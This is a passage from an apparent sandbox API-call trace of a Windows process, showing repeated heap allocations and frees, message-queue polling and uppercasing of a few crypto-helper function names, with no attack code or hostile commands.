hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0259.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0259.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0259.556] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.556] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4998) returned 0x2f21cf0 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4998) returned 0x2f26690 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21cf0 | out: hHeap=0x970000) returned 1 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.557] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0259.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0259.557] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.558] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.558] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0259.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0259.559] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.559] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.559] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0259.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0259.559] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0259.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0259.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0259.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0259.560] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.560] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.560] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4998) returned 0x2f21cf0 [0259.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4998) returned 0x2f2b030 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21cf0 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0259.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4998) returned 0x2f21cf0 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2b030 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4998) returned 0x2f2b030 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21cf0 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0259.562] 